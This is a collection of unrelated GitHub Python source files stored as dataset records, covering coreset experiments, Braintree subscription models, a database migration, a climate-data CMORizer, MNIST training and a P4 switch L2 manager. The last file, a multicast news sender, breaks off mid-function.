bc.SparseVICoreset(x, GaussianProjector(), opt_itrs=arguments.opt_itrs,\n step_sched=eval(arguments.step_sched))\n sparsevi = bc.SparseVICoreset(x, prj_bb, opt_itrs=arguments.opt_itrs, step_sched=eval(arguments.step_sched))\n giga_optimal = bc.HilbertCoreset(x, prj_optimal)\n giga_optimal_exact = bc.HilbertCoreset(x, prj_optimal_exact)\n giga_realistic = bc.HilbertCoreset(x, prj_realistic)\n giga_realistic_exact = bc.HilbertCoreset(x, prj_realistic_exact)\n unif = bc.UniformSamplingCoreset(x)\n\n algs = {'SVI-EXACT': sparsevi_exact,\n 'SVI': sparsevi,\n 'GIGA-OPT': giga_optimal,\n 'GIGA-OPT-EXACT': giga_optimal_exact,\n 'GIGA-REAL': giga_realistic,\n 'GIGA-REAL-EXACT': giga_realistic_exact,\n 'US': unif}\n\n alg = algs[arguments.alg]\n # print('Building coreset')\n t_build = 0\n # print('M = ' + str(Ms) + ': coreset construction, ' + arguments.alg + ' ' + str(arguments.trial))\n t0 = time.process_time()\n itrs = Ms\n alg.build(itrs)\n t_build += time.process_time() - t0\n wts, pts, idcs = alg.get()\n # store weights/pts/runtime\n # w.append(wts)\n # p.append(pts)\n sub_coreset = [x[idx] for idx in idcs]\n return sub_coreset\n\n def get_arguments(self, bc_obj, data_num, point_num=100):\n parser = argparse.ArgumentParser(\n description=\"Runs Riemannian linear regression (employing coreset contruction) on the specified dataset\")\n subparsers = parser.add_subparsers(help='sub-command help')\n run_subparser = subparsers.add_parser('run', help='Runs the main computational code')\n run_subparser.set_defaults(func=bc_obj.construct_bayesian_coreset)\n\n parser.add_argument('--data_num', type=int, default=data_num, help='Dataset size/number of examples')\n parser.add_argument('--data_dim', type=int, default=2,\n help=\"The dimension of the multivariate normal distribution to use for this experiment\")\n parser.add_argument('--alg', type=str, default='GIGA-OPT',\n choices=['SVI', 'SVI-EXACT', 'GIGA-OPT', 'GIGA-OPT-EXACT', 'GIGA-REAL', 'GIGA-REAL-EXACT',\n 'US'],\n help=\"The name of the coreset construction algorithm to use\")\n parser.add_argument(\"--proj_dim\", type=int, default=2000,\n help=\"The number of samples taken when discretizing log likelihoods for these experiments\")\n parser.add_argument('--coreset_size_max', type=int, default=point_num, help=\"The maximum coreset size to evaluate\")\n parser.add_argument('--opt_itrs', type=int, default=200,\n help=\"Number of optimization iterations (for methods that use iterative weight refinement)\")\n parser.add_argument('--step_sched', type=str, default=\"lambda i : 1./(1+i)\",\n help=\"Optimization step schedule (for methods that use iterative weight refinement); entered as a python lambda expression surrounded by quotes\")\n parser.add_argument('--trial', type=int, default=1,\n help=\"The trial number - used to initialize random number generation (for replicability)\")\n parser.add_argument('--verbosity', type=str, default=\"error\",\n choices=['error', 'warning', 'critical', 'info', 'debug'],\n help=\"The verbosity level.\")\n\n arguments = parser.parse_args()\n return arguments\n\n\nif __name__ == '__main__':\n bc_obj = BayesianCoreset()\n cfg = get_cfg_data()\n gd_obj = GaussianDistribution(cfg['space-version']['type'], cfg['guassian-params']['items'])\n distribution = gd_obj.get_guassian_distribution()\n gd_obj.display_gd_distribution(distribution, show=False, scatt=True)\n\n parser = argparse.ArgumentParser(\n description=\"Runs Riemannian linear regression (employing coreset contruction) on the specified dataset\")\n subparsers = parser.add_subparsers(help='sub-command help')\n run_subparser = subparsers.add_parser('run', help='Runs the main computational code')\n run_subparser.set_defaults(func=bc_obj.construct_bayesian_coreset)\n\n parser.add_argument('--data_num', type=int, default='6000', help='Dataset size/number of examples')\n parser.add_argument('--data_dim', type=int, default='2',\n help=\"The dimension of the multivariate normal distribution to use for this experiment\")\n parser.add_argument('--alg', type=str, default='GIGA-OPT',\n choices=['SVI', 'SVI-EXACT', 'GIGA-OPT', 'GIGA-OPT-EXACT', 'GIGA-REAL', 'GIGA-REAL-EXACT',\n 'US'],\n help=\"The name of the coreset construction algorithm to use\")\n parser.add_argument(\"--proj_dim\", type=int, default=2000,\n help=\"The number of samples taken when discretizing log likelihoods for these experiments\")\n parser.add_argument('--coreset_size_max', type=int, default=500, help=\"The maximum coreset size to evaluate\")\n parser.add_argument('--opt_itrs', type=int, default=200,\n help=\"Number of optimization iterations (for methods that use iterative weight refinement)\")\n parser.add_argument('--step_sched', type=str, default=\"lambda i : 1./(1+i)\",\n help=\"Optimization step schedule (for methods that use iterative weight refinement); entered as a python lambda expression surrounded by quotes\")\n parser.add_argument('--trial', type=int, default=1,\n help=\"The trial number - used to initialize random number generation (for replicability)\")\n parser.add_argument('--verbosity', type=str, default=\"error\",\n choices=['error', 'warning', 'critical', 'info', 'debug'],\n help=\"The verbosity level.\")\n\n arguments = parser.parse_args()\n\n print('coreset_size_max: ', arguments.coreset_size_max)\n\n results = bc_obj.construct_bayesian_coreset(distribution, arguments, 'guassian', None)\n print(results)\n","repo_name":"DLwbm123/grizz","sub_path":"survey/bayesian_coreset.py","file_name":"bayesian_coreset.py","file_ext":"py","file_size_in_byte":17255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7504061111","text":"from __future__ import annotations\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models\n\nif settings.USE_PAYMENTS:\n import braintree\nelse:\n # hc.payments tests mock this object, so tests should\n # still be able to run:\n braintree = None\n\n\nADDRESS_KEYS = (\n \"company\",\n \"street_address\",\n \"extended_address\",\n \"locality\",\n \"region\",\n \"postal_code\",\n \"country_code_alpha2\",\n)\n\n\nclass SubscriptionManager(models.Manager):\n def for_user(self, user):\n sub, created = Subscription.objects.get_or_create(user_id=user.id)\n return sub\n\n def by_transaction(self, transaction_id):\n try:\n tx = braintree.Transaction.find(transaction_id)\n except braintree.exceptions.NotFoundError:\n return None, None\n\n try:\n sub = self.get(customer_id=tx.customer_details.id)\n except Subscription.DoesNotExist:\n return None, None\n\n return sub, tx\n\n def by_braintree_webhook(self, request):\n sig = str(request.POST[\"bt_signature\"])\n payload = str(request.POST[\"bt_payload\"])\n\n doc = braintree.WebhookNotification.parse(sig, payload)\n assert doc.kind == \"subscription_charged_successfully\"\n\n sub = self.get(subscription_id=doc.subscription.id)\n return sub, doc.subscription.transactions[0]\n\n\nclass Subscription(models.Model):\n user = models.OneToOneField(User, models.CASCADE, blank=True, null=True)\n customer_id = models.CharField(max_length=36, blank=True)\n payment_method_token = models.CharField(max_length=35, blank=True)\n subscription_id = models.CharField(max_length=10, blank=True)\n plan_id = models.CharField(max_length=10, blank=True)\n plan_name = models.CharField(max_length=50, blank=True)\n address_id = models.CharField(max_length=2, blank=True)\n send_invoices = models.BooleanField(default=True)\n invoice_email = models.EmailField(blank=True)\n\n objects = SubscriptionManager()\n\n @property\n def payment_method(self):\n if not self.subscription_id:\n return None\n\n if not hasattr(self, \"_pm\"):\n o = self._get_braintree_subscription()\n self._pm = braintree.PaymentMethod.find(o.payment_method_token)\n return self._pm\n\n @property\n def is_supporter(self):\n return self.plan_id in (\"S5\", \"S48\")\n\n @property\n def is_business(self):\n return self.plan_id in (\"P20\", \"Y192\")\n\n @property\n def is_business_plus(self):\n return self.plan_id in (\"P80\", \"Y768\")\n\n def is_annual(self):\n return self.plan_id in (\"S48\", \"Y192\", \"Y768\")\n\n def _get_braintree_subscription(self):\n if not hasattr(self, \"_sub\"):\n self._sub = braintree.Subscription.find(self.subscription_id)\n return self._sub\n\n def get_client_token(self):\n assert self.customer_id\n return braintree.ClientToken.generate({\"customer_id\": self.customer_id})\n\n def update_payment_method(self, nonce):\n assert self.subscription_id\n\n result = braintree.Subscription.update(\n self.subscription_id, {\"payment_method_nonce\": nonce}\n )\n\n if not result.is_success:\n return result\n\n def update_address(self, post_data):\n # Create customer record if it does not exist:\n if not self.customer_id:\n result = braintree.Customer.create({\"email\": self.user.email})\n if not result.is_success:\n return result\n\n self.customer_id = result.customer.id\n self.save()\n\n payload = {key: str(post_data.get(key)) for key in ADDRESS_KEYS}\n if self.address_id:\n result = braintree.Address.update(\n self.customer_id, self.address_id, payload\n )\n else:\n payload[\"customer_id\"] = self.customer_id\n result = braintree.Address.create(payload)\n if result.is_success:\n self.address_id = result.address.id\n self.save()\n\n if not result.is_success:\n return result\n\n def setup(self, plan_id, nonce):\n result = braintree.Subscription.create(\n {\"payment_method_nonce\": nonce, \"plan_id\": plan_id}\n )\n\n if result.is_success:\n self.subscription_id = result.subscription.id\n self.plan_id = plan_id\n if plan_id == \"P20\":\n self.plan_name = \"Business ($20 / month)\"\n elif plan_id == \"Y192\":\n self.plan_name = \"Business ($192 / year)\"\n elif plan_id == \"P80\":\n self.plan_name = \"Business Plus ($80 / month)\"\n elif plan_id == \"Y768\":\n self.plan_name = \"Business Plus ($768 / year)\"\n elif plan_id == \"S5\":\n self.plan_name = \"Supporter ($5 / month)\"\n elif plan_id == \"S48\":\n self.plan_name = \"Supporter ($48 / year)\"\n\n self.save()\n\n if not result.is_success:\n return result\n\n def cancel(self):\n if self.subscription_id:\n braintree.Subscription.cancel(self.subscription_id)\n self.subscription_id = \"\"\n\n self.plan_id = \"\"\n self.plan_name = \"\"\n self.save()\n\n def pm_is_card(self):\n pm = self.payment_method\n return isinstance(pm, braintree.credit_card.CreditCard)\n\n def pm_is_paypal(self):\n pm = self.payment_method\n return isinstance(pm, braintree.paypal_account.PayPalAccount)\n\n def next_billing_date(self):\n o = self._get_braintree_subscription()\n return o.next_billing_date\n\n @property\n def address(self):\n if not hasattr(self, \"_address\"):\n try:\n self._address = braintree.Address.find(\n self.customer_id, self.address_id\n )\n except braintree.exceptions.NotFoundError:\n self._address = None\n\n return self._address\n\n @property\n def transactions(self):\n if not hasattr(self, \"_tx\"):\n if not self.customer_id:\n self._tx = []\n else:\n self._tx = list(\n braintree.Transaction.search(\n braintree.TransactionSearch.customer_id == self.customer_id\n )\n )\n\n return self._tx\n","repo_name":"HEROEngineer/healthcheck","sub_path":"hc/payments/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6416,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"21860368011","text":"#!/usr/bin/env python\n# -*- coding:UTF-8 -*-\n# AUTHOR: Mythezone\n# DATE: 2020/01/05 Sun\n# TIME: 14:43:34\n\n# DESCRIPTION:\nimport os,sys,json,socket,time\n\n\ndef gen_msg(tp,idin,content):\n copy_content={}\n for key,value in content.items():\n copy_content[key]=value\n msg={\n \"type\":tp,\n \"id\":idin,\n \"content\":copy_content\n }\n return json.dumps(msg).encode()\n\ndef reg_msg(addr,idin):\n ip,port=addr\n content={\n \"ip\":ip,\n \"port\":port\n }\n return gen_msg(\"register\",idin,content)\n\ndef que_msg(solution,fitness,iteration,timecost,idin):\n content={\n \"solution\":solution,\n \"fitness\":fitness,\n \"iteration\":iteration,\n \"timecost\":timecost\n }\n return gen_msg(\"result\",idin,content)\n\ndef qued_msg(dict_result,idin):\n return gen_msg(\"result\",idin,dict_result)\n\ndef par_msg(msg,ecd=True):\n if ecd==True:\n d=json.loads(msg.decode())\n else:\n d=json.loads(msg)\n return d","repo_name":"mythezone/EC_demo","sub_path":"server/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"2674817260","text":"s1 = \"ab\"\ns2 = \"eidbaooo\"\n\ns1_len = len(s1)\ns2_len = len(s2)\nif s1_len > s2_len:\n print(False)\n\nmap1 = [0] * 26\nfor c in s1:\n map1[ord(c) - 97] += 1\n\nmap2 = [0] * 26\nfor i in range(s1_len):\n map2[ord(s2[i]) - 97] += 1\nif map1 == map2:\n print(True)\nfor i in range(s1_len, s2_len):\n map2[ord(s2[i]) - 97] += 1\n map2[ord(s2[i - s1_len]) - 97] -= 1\n if map1 == map2:\n print(True)\n\nprint(False)\n\n\n\n\n# right = 0\n# left = 0\n# s1_dic = dict()\n# s2_dic = dict()\n\n# for c1 in s1:\n# s1_dic[c1] = (s1_dic.get(c1, 0) + 1) \n# print(s1_dic)\n# while right < len(s2):\n# if s1_dic.get(s2[right]):\n# s2_dic[s2[right]] = (s2_dic.get(s2[right], 0) + 1)\n# i = 0\n# for k, v in s2_dic.items():\n# print(k, v)\n# if s1_dic.get(k, 0) != v:\n# break\n# i += 1\n# print(i)\n# if i == len(s2_dic) and i >= len(s1_dic):\n# print(True)\n# print(s2[left:right])\n\n# else:\n# left += 1\n# right += 1\n# print(s2_dic)","repo_name":"chi811008/leetcode","sub_path":"AlgorithemI/567-Permutation in String.py","file_name":"567-Permutation in String.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"22411333715","text":"\"\"\"Configuração inicial do banco de dados\n\nRevision ID: c3a545577055\nRevises: \nCreate Date: 2018-01-23 18:11:19.302113\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'c3a545577055'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('usuario',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('pis', sa.Integer(), nullable=True),\n sa.Column('nome', sa.String(length=64), nullable=True),\n sa.Column('email', sa.String(length=120), nullable=True),\n sa.Column('username', sa.String(length=120), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.Column('last_seen', sa.DateTime(), nullable=True),\n sa.Column('perfil_colaborador', sa.String(length=15), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_usuario_email'), 'usuario', ['email'], unique=True)\n op.create_index(op.f('ix_usuario_nome'), 'usuario', ['nome'], unique=True)\n op.create_index(op.f('ix_usuario_pis'), 'usuario', ['pis'], unique=True)\n op.create_index(op.f('ix_usuario_username'), 'usuario', ['username'], unique=True)\n op.create_table('integracao',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('caminho', sa.String(length=240), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('data_hora_ultimo_registro', sa.DateTime(), nullable=True),\n sa.Column('id_colaborador', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['id_colaborador'], ['usuario.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('ocorrencia',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('justificativa', sa.String(length=240), nullable=True),\n sa.Column('data_ocorrencia', sa.DateTime(), nullable=True),\n sa.Column('hora_inicio', sa.Integer(), nullable=True),\n sa.Column('hora_fim', sa.Integer(), nullable=True),\n sa.Column('id_colaborador', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['id_colaborador'], ['usuario.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('resposta',\n sa.Column('justificativa', sa.Integer(), nullable=False),\n sa.Column('resposta', sa.String(length=240), nullable=True),\n sa.Column('status', sa.Boolean(), nullable=True),\n sa.Column('id_gestor', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['id_gestor'], ['usuario.id'], ),\n sa.ForeignKeyConstraint(['justificativa'], ['ocorrencia.id'], ),\n sa.PrimaryKeyConstraint('justificativa')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('resposta')\n op.drop_table('ocorrencia')\n op.drop_table('integracao')\n op.drop_index(op.f('ix_usuario_username'), table_name='usuario')\n op.drop_index(op.f('ix_usuario_pis'), table_name='usuario')\n op.drop_index(op.f('ix_usuario_nome'), table_name='usuario')\n op.drop_index(op.f('ix_usuario_email'), table_name='usuario')\n op.drop_table('usuario')\n # ### end Alembic commands ###\n","repo_name":"VictorCoutinho86/timesheet","sub_path":"migrations/versions/c3a545577055_configuração_inicial_do_banco_de_dados.py","file_name":"c3a545577055_configuração_inicial_do_banco_de_dados.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"5521655016","text":"\"\"\"ESMValTool CMORizer for ESACCI-OC data.\n\nTier\n\nSource\n ftp://oceancolour.org/occci-v3.1/geographic/netcdf/monthly/chlor_a/\n user: oc-cci-data\n pass: ELaiWai8ae\n\nLast access\n 20190227\n\nDownload and processing instructions\n In case of issues with data download, check also the information provided at\n OceanColour webpage https://esa-oceancolour-cci.org/\n Put all files under a single directory (no subdirectories with years)\n in ${RAWOBS}/Tier2/ESACCI-OC\n\nModification history\n 20190227-A_lova_to: written.\n\n\"\"\"\n\nimport glob\nimport logging\nimport os\n\nimport iris\nimport xarray as xr\n\nfrom .utilities import (constant_metadata, fix_coords, fix_var_metadata,\n save_variable, set_global_atts)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _fix_data(cube, var):\n \"\"\"Specific data fixes for different variables.\"\"\"\n logger.info(\"Fixing data ...\")\n with constant_metadata(cube):\n if var == 'chl':\n cube *= 1.e-06\n return cube\n\n\ndef _add_depth_coord(cube):\n \"\"\"Add depth auxiliary coordinate for CMIP5 standard.\"\"\"\n if not cube.coords('depth'):\n depth = 1.\n depth_coord = iris.coords.AuxCoord(\n depth,\n standard_name='depth',\n long_name='depth',\n var_name='depth',\n units='m',\n attributes={'positive': 'down'})\n cube.add_aux_coord(depth_coord)\n cube.coordinates = 'depth'\n\n\ndef extract_variable(var_info, raw_info, out_dir, attrs):\n \"\"\"Extract to all vars.\"\"\"\n var = var_info.short_name\n cubes = iris.load(raw_info['file'])\n rawvar = raw_info['name']\n\n for cube in cubes:\n if cube.var_name == rawvar:\n fix_var_metadata(cube, var_info)\n fix_coords(cube)\n _add_depth_coord(cube)\n _fix_data(cube, var)\n set_global_atts(cube, attrs)\n save_variable(\n cube,\n var,\n out_dir,\n attrs,\n local_keys=['coordinates'],\n unlimited_dimensions=['time'],\n )\n\n\ndef merge_data(in_dir, out_dir, raw_info, bins):\n \"\"\"Merge all data into a single (regridded) file.\"\"\"\n var = raw_info['name']\n do_bin = (bins != 0) and (bins % 2 == 0)\n datafile = sorted(glob.glob(in_dir + '/' + raw_info['file'] + '*.nc'))\n for x in datafile:\n ds = xr.open_dataset(x)\n da = ds[var].sel(lat=slice(None, None, -1))\n # remove inconsistent attributes\n for thekeys in [\n 'grid_mapping', 'ancillary_variables', 'parameter_vocab_uri'\n ]:\n del da.attrs[thekeys]\n\n if do_bin:\n da = da.coarsen(lat=bins, boundary='exact').mean()\n da = da.coarsen(lon=bins, boundary='exact').mean()\n\n if x == datafile[0]:\n newda = da\n thekeys = [\n 'creator_name', 'creator_url', 'license', 'sensor',\n 'processing_level'\n ]\n dsmeta = dict((y, ds.attrs[y]) for y in thekeys)\n if do_bin:\n dsmeta['BINNING'] = ' '.join([\n 'Data binned using ', \"{}\".format(bins), 'by',\n \"{}\".format(bins), 'cells average'\n ])\n else:\n dsmeta['BINNING'] = \"\"\n continue\n\n newda = xr.concat((newda, da), dim='time')\n\n # save to file\n ds = newda.to_dataset(name=var)\n for x, y in dsmeta.items():\n ds.attrs[x] = y\n thekeys = {\n 'lat': {\n '_FillValue': False\n },\n 'lon': {\n '_FillValue': False\n },\n 'time': {\n 'calendar': 'gregorian'\n },\n var: {\n '_FillValue': 1.e20\n }\n }\n datafile = os.path.join(out_dir, raw_info['file'] + '_merged.nc')\n ds.to_netcdf(datafile, encoding=thekeys, unlimited_dims='time')\n\n logger.info(\"Merged data written to: %s\", datafile)\n\n return (datafile, dsmeta['BINNING'])\n\n\ndef cmorization(in_dir, out_dir, cfg, _):\n \"\"\"Cmorization func call.\"\"\"\n cmor_table = cfg['cmor_table']\n glob_attrs = cfg['attributes']\n\n # run the cmorization\n for var, vals in cfg['variables'].items():\n var_info = cmor_table.get_variable(vals['mip'], var)\n glob_attrs['mip'] = vals['mip']\n raw_info = {'name': vals['raw'], 'file': vals['file']}\n\n # merge yearly data and apply binning\n inpfile, addinfo = merge_data(in_dir, out_dir, raw_info,\n cfg['custom']['bin_size'])\n\n logger.info(\"CMORizing var %s from file %s\", var, inpfile)\n raw_info['file'] = inpfile\n glob_attrs['comment'] = addinfo + glob_attrs['comment']\n extract_variable(var_info, raw_info, out_dir, glob_attrs)\n\n # Remove temporary input file\n os.remove(inpfile)\n","repo_name":"aperezpredictia/ESMValTool_Cordex","sub_path":"esmvaltool/cmorizers/obs/cmorize_obs_esacci_oc.py","file_name":"cmorize_obs_esacci_oc.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"18363419120","text":"import numpy as np\nfrom keras.datasets import mnist\nfrom keras.callbacks import ModelCheckpoint, Callback, EarlyStopping\nfrom keras.utils import np_utils\n\nfrom testcallback import TestCallback\nfrom cnnmodel import CNNModel\nimport config\n\n\ndef preprocessing(train: np.ndarray):\n return train.astype(np.float32) / 255\n\n\ndef main(config):\n # data loading & preprocessing\n (X_train_orig, Y_train_orig), (X_test_orig, Y_test_orig) = mnist.load_data()\n X_train = X_train_orig.reshape((-1, 28, 28, 1))\n X_train = preprocessing(X_train)\n X_test = X_test_orig.reshape((-1, 28, 28, 1))\n X_test = preprocessing(X_test)\n Y_train = np_utils.to_categorical(Y_train_orig)\n Y_test = np_utils.to_categorical(Y_test_orig)\n\n print(\"X_train shape: {}\".format(X_train.shape))\n print(\"Y_train shape: {}\".format(Y_train.shape))\n\n model = CNNModel(input_shape=config.INPUT_SHAPE, output_class=config.OUTPUT_CLASS)\n\n model.compile(loss=config.LOSS,\n optimizer=config.OPTIMIZER,\n metrics=config.METRICS)\n\n checkpoint = ModelCheckpoint(config.CHECKPOINT_FILEPATH, monitor='val_loss', verbose=1)\n earlystop = EarlyStopping()\n\n evaluate = TestCallback((X_test, Y_test))\n\n callbacks_list = [\n checkpoint,\n earlystop,\n evaluate,\n ]\n\n model.fit(X_train, Y_train,\n batch_size=64, epochs=10, verbose=1,\n callbacks=callbacks_list, validation_split=0.01)\n\n if config.SAVE_MODEL:\n model.save(config.SAVE_MODEL_FILENAME)\n print(\"Model saved to file: {}\".format(config.SAVE_MODEL_FILENAME))\n\n\nif __name__ == '__main__':\n main(config.Config)\n","repo_name":"leohaipengli/handwritten-digits-recognition","sub_path":"training_app/digitrecognition.py","file_name":"digitrecognition.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"85"} +{"seq_id":"34180823560","text":"# common\nfrom common_lib.logger import Logger\nfrom common_lib.event import EventSystem\n\n# local\nfrom local_lib.packet.cpu import CPUPacket, Notification\nfrom local_lib.p4runtime_lib import SwitchConnection\nfrom local_lib.settings import Settings\n\n# other\nfrom time import time\nfrom copy import copy\nfrom typing import Dict, List\nfrom datetime import datetime, timedelta\nfrom scapy.all import ARP, Ether # type: ignore\n\n\nclass L2Entry:\n\n def __init__(self, mac: str, port: int, timestamp: int):\n self._mac = mac\n self._port = port\n self._timestamp = timestamp\n\n def refresh(self, timestamp):\n self._timestamp = timestamp\n\n def get_mac(self):\n return self._mac\n\n def get_port(self):\n return self._port\n\n def set_timestamp(self, timestamp: int) -> None:\n self._timestamp = timestamp\n\n def get_timestamp(self):\n return self._timestamp\n\n def __str__(self):\n return \"MAC: \" + self.get_mac() + \\\n \", Port: \" + str(self.get_port()) + \\\n \", Timestamp: \" + str(datetime.fromtimestamp(self.get_timestamp()))\n\nclass L2Manager:\n def __init__(self,\n logger: Logger,\n settings: Settings,\n event_system: EventSystem,\n switch_connection: SwitchConnection\n ) -> None:\n # utils\n self._logger = logger\n self._settings = settings\n self._switch_connection = switch_connection\n\n # attributes\n self._mapping = { } # type: Dict[ str, L2Entry ]\n self._l2_mapping_timeout = 40 #s\n self._gateway_mac_set = False\n\n event_system.set_interval(self._remove_old_macs, self._l2_mapping_timeout)\n\n def _set_entry(self, entry):\n self._mapping[entry.get_mac()] = entry\n\n def _delete_entry(self, entry):\n del self._mapping[entry.get_mac()]\n\n def _has_entry(self, mac_address):\n return mac_address in self._mapping\n\n def _get_entry(self, mac_address):\n return self._mapping[mac_address]\n\n def _write_l2_entry(self, entry):\n self._logger.debug(\"writing l2 entry (\" + str(entry) + \")\", 4)\n self._set_entry(entry)\n self._switch_connection.write( \\\n table_name=\"ingress.ethernet.forward.mac_dst\", \\\n match_fields={ \"hdr.ethernet.dstAddr\": entry.get_mac() }, \\\n action_name=\"ingress.ethernet.forward.forward\", \\\n action_params={ \"port\": entry.get_port() } \\\n )\n\n self._switch_connection.write(\n table_name=\"ingress.ethernet.learn.mac_src\", \\\n match_fields={ \"hdr.ethernet.srcAddr\": entry.get_mac() }, \\\n action_name=\"ingress.ethernet.learn.src_known\",\n action_params={ \\\n \"port\": entry.get_port(),\n \"refresh_time\": int(datetime.timestamp(datetime.now() + timedelta(seconds=self._l2_mapping_timeout / 2)))\n } \\\n )\n\n def _delete_l2_entry(self, entry):\n self._logger.debug(\"deleting l2 entry (\" + str(entry) + \")\", 4)\n self._delete_entry(entry)\n self._switch_connection.delete( \\\n table_name=\"ingress.ethernet.forward.mac_dst\", \\\n match_fields={ \"hdr.ethernet.dstAddr\": entry.get_mac() } \\\n )\n\n self._switch_connection.delete( \\\n table_name=\"ingress.ethernet.learn.mac_src\", \\\n match_fields={ \"hdr.ethernet.srcAddr\": entry.get_mac() } \\\n )\n\n def _update_l2_entry(self, entry):\n \"\"\"\n update an l2 entry, thus save it in software and write to switch.\n entry: L2Entry\n \"\"\"\n self._logger.debug(\"update entry (\" + str(entry) + \")\")\n # delete old entries -> prevent errors by p4\n if self._has_entry(entry.get_mac()):\n self._delete_l2_entry(entry)\n self._write_l2_entry(entry)\n\n def learn_source(self, packet):\n \"\"\"\n Learn a source mac address.\n packet: CPUPacket\n \"\"\"\n ethernet = packet[\"Ether\"]\n self._logger.debug(\"Learn new mac address {mac} on port {port}\"\n .format(mac=ethernet.src, port=packet.port))\n if ethernet.src.lower() == self._settings.get_mac().lower():\n if not self._gateway_mac_set:\n self._switch_connection.write(\n table_name=\"ingress.ethernet.learn.mac_src\", \\\n match_fields={ \"hdr.ethernet.srcAddr\": ethernet.src }, \\\n action_name=\"ingress.ethernet.learn.ignore_source\"\n )\n self._gateway_mac_set = True\n else:\n self._update_l2_entry(L2Entry(ethernet.src, packet.port, int(time())))\n\n def _flood_packet(self, packet: CPUPacket) -> None:\n \"\"\"\n Flood packet to all ports except the ingress port.\n packet: CPUPacket\n \"\"\"\n packets = [] # type: List[ bytes ]\n for i in range(1, self._switch_connection.get_num_ports()):\n if i != packet.port:\n self._logger.debug(\"flooding, port \" + str(i), 4)\n cpu = CPUPacket(reason=\"SEND_DIRECT\", port=i)\n packets += [ bytes(cpu / copy(packet[\"Ether\"])) ]\n\n self._switch_connection.send_packets_out(packets)\n\n def process_packet(self, packet):\n \"\"\"\n process packet\n packet: CPUPacket\n \"\"\"\n\n type = packet.type\n\n if type == Notification(type=\"SRC_MAC_UNKNOWN\").type \\\n or type == Notification(type=\"REFRESH_L2_ENTRY\").type \\\n or type == Notification(type=\"CHANGED_L2_ENTRY\").type:\n self.learn_source(packet)\n cpu = CPUPacket(\n reason=\"SEND\",\n port=packet.port\n )\n self._switch_connection.send_packet_out(bytes(cpu / packet[\"Ether\"]))\n elif type == Notification(type=\"DST_MAC_UNKNOWN\").type:\n self._logger.debug(\"destination mac {mac} unknown\"\n .format(mac=packet[\"Ether\"].dst))\n self._flood_packet(packet)\n elif type == Notification(type=\"ARP\").type:\n arp = packet[\"ARP\"]\n if arp.pdst == self._settings.get_gateway():\n reply = ARP(op=\"is-at\", hwsrc=self._settings.get_mac(),\n psrc=arp.pdst, hwdst=\"FF:FF:FF:FF:FF:FF\",\n pdst=arp.psrc)\n\n cpu = CPUPacket(\n reason=\"SEND_DIRECT\",\n port=packet.port,\n )\n cpu.payload = Ether(src=self._settings.get_mac(), dst=packet[\"Ether\"].src) / reply\n self._switch_connection.send_packet_out(bytes(cpu))\n else:\n self._flood_packet(packet)\n\n def _remove_old_macs(self) -> None:\n self._logger.debug(\"Remove old l2 entries.\")\n old_entries = [ entry for mac, entry in self._mapping.items()\n if datetime.fromtimestamp(entry.get_timestamp()) \\\n + timedelta(seconds=self._l2_mapping_timeout) < datetime.now() ]\n\n for entry in old_entries:\n self._delete_l2_entry(entry)\n","repo_name":"uni-tue-kn/P4sec","sub_path":"local_lib/manager/l2.py","file_name":"l2.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"16166837653","text":"from __future__ import print_function\nimport sys\nimport socket\nimport datetime\nimport time\nimport urllib\nimport urllib2\n\n#------------------------------------------------------------------------------\n\nusage = \"Usage: python lisp-news-sender.py []\"\nsource = \"\"\ngroup = \"\"\nport = \"\"\nmsocket = None\n\n#------------------------------------------------------------------------------\n\ndef bold(string):\n return(\"\\033[1m\" + string + \"\\033[0m\")\n#enddef\n\ndef send_messages(messages):\n ts = datetime.datetime.now().strftime(\"%m/%d/%y %H:%M:%S.%f\")\n for message in messages:\n print(\"Send message at {}:\\n{}\".format(ts, message), end=\" \")\n \n #\n # Send the message.\n # \n try: msocket.sendto(message, (group, port))\n except socket.error as e:\n print(\"socket.sendto() failed: {}\".format(e))\n #endtry\n time.sleep(.25)\n #endfor\n#enddef\n\ndef get_cool_message():\n ts = str(time.time()).split(\".\")[0]\n odd_even = int(ts) & 1\n message = \"time is odd\\n\" if odd_even else \"time is even\\n\"\n return([message])\n#enddef\n\ndef get_headlines():\n try:\n u = 